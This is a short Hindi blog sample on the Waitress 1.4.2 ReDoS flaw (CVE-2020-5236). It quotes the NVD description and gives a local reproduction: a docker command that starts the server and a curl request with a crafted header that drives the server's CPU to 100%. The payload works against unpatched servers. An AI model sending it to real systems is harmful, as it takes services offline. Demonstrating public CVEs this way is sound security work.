
Waitress 1.4.2 ReDoS - CVE-2020-5236 (ब्लॉग नमूना कोड)
Waitress संस्करण 1.4.2 DoS हमले की अनुमति देता है, जब Waitress को एक ऐसा हेडर प्राप्त होता है जिसमें अमान्य वर्ण होते हैं। जब "Bad-header: xxxxxxxxxxxxxxx\x10" जैसा हेडर प्राप्त होता है, तो यह रेगुलर एक्सप्रेशन इंजन को भयावह रूप से बैकट्रैक करने का कारण बनता है, जिससे प्रक्रिया 100% CPU समय उपयोग करती है और अन्य सभी इंटरैक्शन को अवरुद्ध कर देती है। यह एक हमलावर को अमान्य हेडर के साथ एक अनुरोध भेजकर सेवा को ऑफ़लाइन करने की अनुमति देता है।
NVD द्वारा
$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py
$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"
सर्वर के लिए CPU उपयोग दिखाएँ। "docker stats waitress" निष्पादित करें।

↓ PoC निष्पादित करें
